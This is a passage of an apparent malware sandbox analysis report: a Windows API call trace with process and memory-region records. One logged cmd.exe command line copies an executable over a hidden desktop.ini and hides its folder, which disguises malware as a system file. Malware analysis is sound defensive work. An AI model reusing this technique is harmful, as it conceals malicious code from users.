lpOverlapped=0x0) returned 1 [0132.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.630] GetFileType (hFile=0x4c) returned 0x1 [0132.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.630] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3f0*, lpNumberOfBytesWritten=0x26e3f4*=0x20, lpOverlapped=0x0) returned 1 [0132.630] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.630] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e3e0 | out: lpNewFilePointer=0x0) returned 1 [0132.630] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.630] ReadFile (in: hFile=0x54, lpBuffer=0x26f210, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e400, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesRead=0x26e400*=0x200, lpOverlapped=0x0) returned 1 [0132.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.630] GetFileType (hFile=0x4c) returned 0x1 [0132.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.630] GetFileType (hFile=0x4c) returned 0x1 [0132.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.630] WriteFile (in: hFile=0x4c, lpBuffer=0x26f210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.630] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.631] GetFileType (hFile=0x4c) returned 0x1 [0132.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.631] WriteFile (in: hFile=0x4c, lpBuffer=0x26f260*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f260*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.631] GetFileType (hFile=0x4c) returned 0x1 [0132.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.631] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f2b0*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.631] GetFileType (hFile=0x4c) returned 0x1 [0132.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.631] WriteFile (in: hFile=0x4c, lpBuffer=0x26f300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f300*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.631] GetFileType (hFile=0x4c) returned 0x1 [0132.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.631] WriteFile (in: hFile=0x4c, lpBuffer=0x26f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f350*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.631] GetFileType (hFile=0x4c) returned 0x1 [0132.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.631] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3a0*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.631] GetFileType (hFile=0x4c) returned 0x1 [0132.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.631] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3f0*, lpNumberOfBytesWritten=0x26e3f4*=0x20, lpOverlapped=0x0) returned 1 [0132.631] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.631] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e3e0 | out: lpNewFilePointer=0x0) returned 1 [0132.631] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.631] ReadFile (in: hFile=0x54, lpBuffer=0x26f210, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e400, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesRead=0x26e400*=0x200, lpOverlapped=0x0) returned 1 [0132.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.631] GetFileType (hFile=0x4c) returned 0x1 [0132.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.631] GetFileType (hFile=0x4c) returned 0x1 [0132.631] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.631] WriteFile (in: hFile=0x4c, lpBuffer=0x26f210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.632] GetFileType (hFile=0x4c) returned 0x1 [0132.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.632] WriteFile (in: hFile=0x4c, lpBuffer=0x26f260*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f260*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.632] GetFileType (hFile=0x4c) returned 0x1 [0132.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.632] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f2b0*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.632] GetFileType (hFile=0x4c) returned 0x1 [0132.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.632] WriteFile (in: hFile=0x4c, lpBuffer=0x26f300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f300*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.632] GetFileType (hFile=0x4c) returned 0x1 [0132.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.632] WriteFile (in: hFile=0x4c, lpBuffer=0x26f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f350*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.632] GetFileType (hFile=0x4c) returned 0x1 [0132.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.632] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3a0*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.632] GetFileType (hFile=0x4c) returned 0x1 [0132.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.632] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3f0*, lpNumberOfBytesWritten=0x26e3f4*=0x20, lpOverlapped=0x0) returned 1 [0132.632] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.632] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e3e0 | out: lpNewFilePointer=0x0) returned 1 [0132.632] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.632] ReadFile (in: hFile=0x54, lpBuffer=0x26f210, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e400, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesRead=0x26e400*=0x200, lpOverlapped=0x0) returned 1 [0132.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.632] GetFileType (hFile=0x4c) returned 0x1 [0132.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.632] GetFileType (hFile=0x4c) returned 0x1 [0132.632] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.633] WriteFile (in: hFile=0x4c, lpBuffer=0x26f210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.633] GetFileType (hFile=0x4c) returned 0x1 [0132.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.633] WriteFile (in: hFile=0x4c, lpBuffer=0x26f260*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f260*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.633] GetFileType (hFile=0x4c) returned 0x1 [0132.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.633] WriteFile (in: hFile=0x4c, lpBuffer=0x26f2b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f2b0*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.633] GetFileType (hFile=0x4c) returned 0x1 [0132.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.633] WriteFile (in: hFile=0x4c, lpBuffer=0x26f300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f300*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.633] GetFileType (hFile=0x4c) returned 0x1 [0132.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.633] WriteFile (in: hFile=0x4c, lpBuffer=0x26f350*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f350*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.633] GetFileType (hFile=0x4c) returned 0x1 [0132.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.633] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3a0*, lpNumberOfBytesWritten=0x26e3f4*=0x50, lpOverlapped=0x0) returned 1 [0132.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.633] GetFileType (hFile=0x4c) returned 0x1 [0132.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.633] WriteFile (in: hFile=0x4c, lpBuffer=0x26f3f0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f3f0*, lpNumberOfBytesWritten=0x26e3f4*=0x20, lpOverlapped=0x0) returned 1 [0132.633] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.633] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e3e0 | out: lpNewFilePointer=0x0) returned 1 [0132.633] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.633] ReadFile (in: hFile=0x54, lpBuffer=0x26f210, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e400, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesRead=0x26e400*=0x32, lpOverlapped=0x0) returned 1 [0132.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.633] GetFileType (hFile=0x4c) returned 0x1 [0132.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.633] GetFileType (hFile=0x4c) returned 0x1 [0132.633] _get_osfhandle (_FileHandle=1) returned 0x4c [0132.633] WriteFile (in: hFile=0x4c, lpBuffer=0x26f210*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x26e3f4, lpOverlapped=0x0 | out: lpBuffer=0x26f210*, lpNumberOfBytesWritten=0x26e3f4*=0x32, lpOverlapped=0x0) returned 1 [0132.634] _get_osfhandle (_FileHandle=4) returned 0x54 [0132.634] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e3e0 | out: lpNewFilePointer=0x0) returned 1 [0132.634] _close (_FileHandle=4) returned 0 [0132.634] FindNextFileW (in: hFindFile=0x2a0e70, lpFindFileData=0x26f474 | out: lpFindFileData=0x26f474) returned 0 [0132.634] GetLastError () returned 0x12 [0132.634] FindClose (in: hFindFile=0x2a0e70 | out: hFindFile=0x2a0e70) returned 1 [0132.634] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0132.781] _close (_FileHandle=3) returned 0 [0132.781] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.781] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0132.781] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.781] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0132.781] _get_osfhandle (_FileHandle=0) returned 0x3 [0132.781] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0132.781] SetConsoleInputExeNameW () returned 0x1 [0132.781] GetConsoleOutputCP () returned 0x1b5 [0132.781] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0132.781] SetThreadUILanguage (LangId=0x0) returned 0x409 [0132.782] exit (_Code=0) Process: id = "117" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16740" os_pid = "0xa70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12506 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12507 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 12508 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 12509 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 12510 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 12511 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12512 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12513 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 12514 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 12515 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 12564 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12565 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12566 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 12567 start_va = 0x2b0000 end_va = 0x316fff entry_point = 0x2b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12568 start_va = 0x3c0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 12569 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 12570 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12571 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 12572 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12573 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12574 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12575 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 12576 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12577 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 12578 start_va = 0x3d0000 end_va = 0x497fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 12579 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12580 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 12581 start_va = 0x150000 end_va = 0x156fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 12582 start_va = 0x160000 end_va = 0x161fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 12583 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 12584 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 12585 start_va = 0x4a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 12586 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 12587 start_va = 0x11b0000 end_va = 0x1312fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Region: id = 12641 start_va = 0x1320000 end_va = 0x15eefff entry_point = 0x1320000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 174 os_tid = 0xbf0 [0132.654] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fa1c | out: lpSystemTimeAsFileTime=0x12fa1c*(dwLowDateTime=0x88ff81e0, dwHighDateTime=0x1d440a9)) [0132.654] GetCurrentProcessId () returned 0xa70 [0132.654] GetCurrentThreadId () returned 0xbf0 [0132.654] GetTickCount () returned 0x2a311 [0132.654] QueryPerformanceCounter (in: lpPerformanceCount=0x12fa14 | out: lpPerformanceCount=0x12fa14*=18944294206) returned 1 [0132.654] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0132.654] __set_app_type (_Type=0x1) [0132.654] __p__fmode () returned 0x76b331f4 [0132.654] __p__commode () returned 0x76b331fc [0132.654] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0132.655] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0132.655] GetCurrentThreadId () returned 0xbf0 [0132.655] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbf0) returned 0x38 [0132.655] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0132.655] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0132.655] SetThreadUILanguage (LangId=0x0) returned 0x409 [0132.655] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0132.655] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12f9ac | out: phkResult=0x12f9ac*=0x0) returned 0x2 [0132.655] VirtualQuery (in: lpAddress=0x12f9e3, lpBuffer=0x12f97c, dwLength=0x1c | out: lpBuffer=0x12f97c*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0132.655] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12f97c, dwLength=0x1c | out: lpBuffer=0x12f97c*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0132.655] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12f97c, dwLength=0x1c | out: lpBuffer=0x12f97c*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0132.655] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12f97c, dwLength=0x1c | out: lpBuffer=0x12f97c*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0132.655] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12f97c, dwLength=0x1c | out: lpBuffer=0x12f97c*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0132.655] GetConsoleOutputCP () returned 0x1b5 [0132.655] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0132.655] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0132.655] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.655] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0132.656] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.656] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0132.656] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.656] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0132.656] _get_osfhandle (_FileHandle=0) returned 0x3 [0132.656] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0132.656] _get_osfhandle (_FileHandle=0) returned 0x3 [0132.656] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0132.656] GetEnvironmentStringsW () returned 0x1c0480* [0132.656] FreeEnvironmentStringsW (penv=0x1c0480) returned 1 [0132.656] GetEnvironmentStringsW () returned 0x1c0480* [0132.657] FreeEnvironmentStringsW (penv=0x1c0480) returned 1 [0132.657] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e91c | out: phkResult=0x12e91c*=0x40) returned 0x0 [0132.657] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e924, lpData=0x12e928, lpcbData=0x12e920*=0x1000 | out: lpType=0x12e924*=0x0, lpData=0x12e928*=0x30, lpcbData=0x12e920*=0x1000) returned 0x2 [0132.657] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e924, lpData=0x12e928, lpcbData=0x12e920*=0x1000 | out: lpType=0x12e924*=0x4, lpData=0x12e928*=0x1, lpcbData=0x12e920*=0x4) returned 0x0 [0132.657] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e924, lpData=0x12e928, lpcbData=0x12e920*=0x1000 | out: lpType=0x12e924*=0x0, lpData=0x12e928*=0x1, lpcbData=0x12e920*=0x1000) returned 0x2 [0132.657] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e924, lpData=0x12e928, lpcbData=0x12e920*=0x1000 | out: lpType=0x12e924*=0x4, lpData=0x12e928*=0x0, lpcbData=0x12e920*=0x4) returned 0x0 [0132.657] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e924, lpData=0x12e928, lpcbData=0x12e920*=0x1000 | out: lpType=0x12e924*=0x4, lpData=0x12e928*=0x40, lpcbData=0x12e920*=0x4) returned 0x0 [0132.657] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e924, lpData=0x12e928, lpcbData=0x12e920*=0x1000 | out: 